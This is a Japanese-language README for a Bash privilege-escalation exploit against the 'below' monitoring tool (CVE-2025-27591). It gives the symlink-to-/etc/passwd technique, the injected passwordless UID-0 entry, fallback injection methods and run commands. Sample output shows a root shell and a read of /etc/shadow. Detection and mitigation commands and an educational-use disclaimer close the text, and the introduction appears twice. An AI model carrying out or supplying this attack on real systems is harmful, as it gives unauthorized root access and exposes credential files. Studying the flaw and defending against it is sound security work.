
Bashベースの特権昇格エクスプロイトで、`below`システムパフォーマンス監視ツールを標的にしたものです。この改良版エクスプロイトは、ログメカニズムにおけるシンボリックリンクの脆弱性を利用して`/etc/passwd`にrootユーザーを注入し、完全なrootアクセスを達成します。
below システムパフォーマンス監視ツールを標的とした Bash ベースの権限昇格エクスプロイトです。この改良版エクスプロイトは、ログ機構のシンボリックリンク脆弱性を悪用し、/etc/passwd に root ユーザーを注入することで、完全な root アクセスを獲得します。
発見および報告者:Matthias Gerstner(SUSE - Security Advisory)
/usr/bin/below(Facebook のシステムパフォーマンスモニター)/var/log/below/error_root.log → /etc/passwdbelow 監視ツールは、昇格された権限で動作する際に /var/log/below/error_root.log にエラーを記録します。ログディレクトリがワールドワライト可能である場合、攻撃者は以下を実行できます:
error_root.log から /etc/passwd へのシンボリックリンクを作成するbelow record コマンドを実行してエラーメッセージをシンボリックリンクに書き込ませるこのエクスプロイトは、様々なシステム構成に対応するインテリジェントなフォールバック機構を備え、プロセス全体を自動化します。
flowchart TD
A[エクスプロイト開始] --> B[ユーザーからユーザー名を取得]
B --> C{/var/log/below が<br/>ワールドワライト?}
C -->|いいえ| D[終了: 脆弱性なし]
C -->|はい| E[既存の error_root.log を削除]
E --> F[シンボリックリンク作成:<br/>error_root.log → /etc/passwd]
F --> G{シンボリックリンク作成<br/>成功?}
G -->|いいえ| D
G -->|はい| H[実行: sudo below record]
H --> I[3秒待機してログを記録]
I --> J[below プロセスを強制終了]
J --> K{ペイロードが<br/>/etc/passwd に存在?}
K -->|はい| M[成功パス]
K -->|いいえ| L[手動注入を試行:<br/>echo payload >> symlink]
L --> N{手動注入<br/>成功?}
N -->|いいえ| O[フォールバックを試行:<br/>sudo tee -a]
N -->|はい| M
O --> P{フォールバック<br/>成功?}
P -->|いいえ| D
P -->|はい| M
M --> Q[/etc/passwd 内のペイロードを検証]
Q --> R[クリーンアップトラップを無効化]
R --> S[実行: su username]
S --> T[Root シェル獲得]
style A fill:#e1f5ff
style T fill:#90EE90
style D fill:#ffcccb
style M fill:#98fb98
事前確認フェーズ
/var/log/below ディレクトリが存在するか確認セットアップフェーズ
error_root.log ファイルを削除/var/log/below/error_root.log → /etc/passwd注入フェーズ(主方式)
sudo below record を実行/etc/passwd を有用な形で破損したか確認注入フェーズ(フォールバック方式)
echo >> symlink)sudo tee -a)シェル起動フェーズ
/etc/passwd に悪意のあるユーザーが存在するか確認su <username> を実行して root シェルを獲得注入される /etc/passwd エントリの形式は以下の通りです。
username::0:0:username:/root:/bin/bash
フィールド内訳:
username: ユーザー指定のユーザー名(デフォルト: "0xdtc")::: 空のパスワードフィールド(パスワード不要)0:0: UID=0, GID=0(root 権限)username: GECOS フィールド(ユーザー説明)/root: ホームディレクトリ/bin/bash: ログインシェルbelow バイナリが動作しているターゲットシステム/var/log/below ディレクトリがワールドワライト可能であることbelow record を実行するための sudo アクセス権限を持っていること# スクリプトを実行可能にする
chmod +x CVE-2025-27591
# エクスプロイトを実行
./CVE-2025-27591
========================================
CVE-2025-27591 Exploit (Bash)
========================================
[*] このエクスプロイトは /etc/passwd に新しい root ユーザーを作成します
[?] 新しい root ユーザーのユーザー名を入力してください(デフォルト: 0xdtc): myuser
[+] ユーザー名を使用: myuser
0xdtc@kali:/tmp$ ./CVE-2025-27591
========================================
CVE-2025-27591 Exploit (Bash)
========================================
[*] このエクスプロイトは /etc/passwd に新しい root ユーザーを作成します
[?] 新しい root ユーザーのユーザー名を入力してください(デフォルト: 0xdtc): 0xdtc
[+] ユーザー名を使用: 0xdtc
[*] CVE-2025-27591 の脆弱性を確認中
[+] /var/log/below はワールドワライト可能です
[*] シンボリックリンク作成をテスト中
[+] シンボリックリンクテスト成功
[+] ターゲットは脆弱です
[*] エクスプロイトを開始
[+] ペイロードを /tmp/exploit_payload に書き込みました
[*] シンボリックリンクを作成: /var/log/below/error_root.log -> /etc/passwd
[+] シンボリックリンク作成
[*] ログ記録をトリガーするために 'sudo below record' を実行
[*] PID 12345 で 'below record' を開始
[*] ペイロードが書き込まれたか確認中
[*] 手動注入を試行
[*] シンボリックリンク経由で /etc/passwd にペイロードを追記
[+] ペイロードを追記
[+] エクスプロイト完了!ペイロードは /etc/passwd にあります
[*] 'su 0xdtc' で root シェルを起動
[*] パスワードは空のはずです。Enter キーを押してください
root@kali:/tmp# whoami
root
スクリプトには、様々なシステム構成に対応する複数のフォールバック機構が含まれています。
既存ファイルの処理
複数の注入方式
below record のエラーログをトリガーsudo tee を使用した特権書き込みプロセス管理
below プロセスを自動的に強制終了再実行検出
/etc/passwd にペイロードが既に存在するか確認.
├── CVE-2025-27591 # メインエクスプロイトスクリプト
├── README.md # このドキュメント
└── /tmp/exploit_payload # 一時ペイロードファイル(実行時に作成)
エクスプロイト成功後、root アクセスを確認します。
# 現在のユーザーを確認
root@target:/tmp# whoami
root
# ユーザーIDとグループを確認
root@target:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
# /etc/passwd 内のユーザーを確認
root@target:/tmp# grep "^0xdtc:" /etc/passwd
0xdtc::0:0:0xdtc:/root:/bin/bash
# root のみ読み取り可能なファイルを表示
root@target:/tmp# cat /etc/shadow
[... shadow ファイルの内容 ...]
テスト後に悪意のあるユーザーを削除する必要がある場合:
# /etc/passwd から注入したユーザーを削除
sudo sed -i '/^username:/d' /etc/passwd
# 残ったシンボリックリンクを削除
rm -f /var/log/below/error_root.log
username はエクスプロイト時に使用した実際のユーザー名に置き換えてください。
ファイル整合性監視
# /etc/passwd への不正な変更を監視
aide --check
シンボリックリンク検出
# ログディレクトリ内の不審なシンボリックリンクを確認
find /var/log -type l -ls
監査ログ
# 不審な sudo 使用状況を確認
grep "below record" /var/log/auth.log
ディレクトリ権限の修正
# ログディレクトリからワールドワライト権限を削除
sudo chmod 755 /var/log/below
AppArmor/SELinux ポリシー
below バイナリのファイル書き込み場所を制限Below の更新
/etc/passwd の監視
このエクスプロイトは教育目的および許可されたペネトレーションテスト専用です。
コンピュータシステムへの不正アクセスは違法です。このツールは、セキュリティテストの実施について明示的な許可があるシステムでのみ使用してください。著者は、このツールの誤用に対していかなる責任も負いません。
このエクスプロイトを使用することにより、以下のことを確認したものとみなされます。
Repository: https://github.com/0xDTC/ Author: Divine Clown (0xDTC) License: Educational Use Only 最終更新日: 2025-11-13